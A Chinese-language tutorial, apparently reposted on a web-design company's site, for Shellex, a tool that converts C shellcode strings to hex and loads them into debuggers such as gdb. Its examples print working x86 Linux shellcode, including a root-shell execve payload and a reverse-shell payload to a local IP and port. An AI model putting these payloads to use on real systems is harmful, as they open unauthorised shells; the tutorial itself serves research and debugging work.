扫二维码与项目经理沟通
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流
这篇文章给大家分享的是有关Shellex怎么用的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
为企业提供成都网站制作、网站设计、外贸网站建设、网站优化、全网整合营销推广、竞价托管、品牌运营等营销获客服务。创新互联拥有网络营销运营团队,以丰富的互联网营销经验助力企业精准获客,真正落地解决中小企业营销获客难题,做到“让获客更简单”。自创立至今,成功用技术实力解决了企业“网站建设、网络品牌塑造、网络营销”三大难题,同时降低了营销成本,提高了有效客户转化率,获得了众多企业客户的高度认可!
Shellex是一款功能强大的C-shellcode转换器,可以帮助广大研究人员将C-shellcode转换为十六进制代码,并且能够在gdb、windbg、radare2、ollydbg、x64dbg、immunity调试器和010编辑器中粘贴和执行shellcode。
在Shellex的帮助下,广大研究人员可以将C-shellcode代码转换为十六进制代码,并且还可以在C编译器中编译时进行转换,整个过程只需要执行Shellex,并将shellcode代码拷贝进去并按下回车键即可。
比如说,我们可以转换多行混合了ASCII代码的C-shellcode(注意混合部分\x68//sh\x68/bin\x89):
"\x6a\x17\x58\x31\xdb\xcd\x80" "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
Shellex输出如下:
6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
转换包含注释代码的C-shellcode:
"\x68" "\x7f\x01\x01\x01" // <- IP: 127.1.1.1 "\x5e\x66\x68" "\xd9\x03" // <- Port: 55555 "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02" "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79" "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a" "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\xeb\xce"
Shellex输出如下:
68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE
如果你需要Shellex输出新的C-shellcode字符串,可以使用-h参数,比如说:
./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80
首先,广大研究人员需要使用下列代码将该项目源码克隆至本地:
git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git
针对Windows:
shellex\bins\shellex.exe
针对Linux:
sudo apt-get install tcc shellex/linuxbins/shellex
首先,我们需要运行Shellex。
接下来,输入我们的shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80" "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
按下回车键后,再按下Control+D键。
使用shellex -h命令将Shellex输出转换为C-Hex字符串:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
将C-Hex字符串以源码形式(包含“echo”命令)写入至文件:
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
接下来,将源码文件写入当前指令指针。
32位:
restore /tmp/sc binary $eip x/30b $eip x/15i $eip
64位:
restore /tmp/sc binary $rip x/30b $rip x/15i $rip
x/30b是shellcode的字节大小,我们可以使用下列命令获取到大小值:
wc -c /tmp/sc
x/15i是显示的指令数量,我们可以使用ndisasm获取正确的数量:
sudo apt-get install nasm
32位:
ndisasm -b32 /tmp/sc ndisasm -b32 /tmp/sc | wc -l
64位:
ndisasm -b64 /tmp/sc ndisasm -b64 /tmp/sc | wc -l
在Linux中转换“\x6a\x17\x58\x31\xdb\xcd\x80”:
echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex
在Windows中转换“\x6a\x17\x58\x31\xdb\xcd\x80”:
echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe
Windows下写入多行文件:
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt "\x6a\x17\x58\x31\xdb\xcd\x80" "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80" C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe
Linux下写入多行文件:
dreg@fr33project# cat sc.txt "\x6a\x17\x58\x31\xdb\xcd\x80" "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80" dreg@fr33project# cat sc.txt | shellex
感谢各位的阅读!关于“Shellex怎么用”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流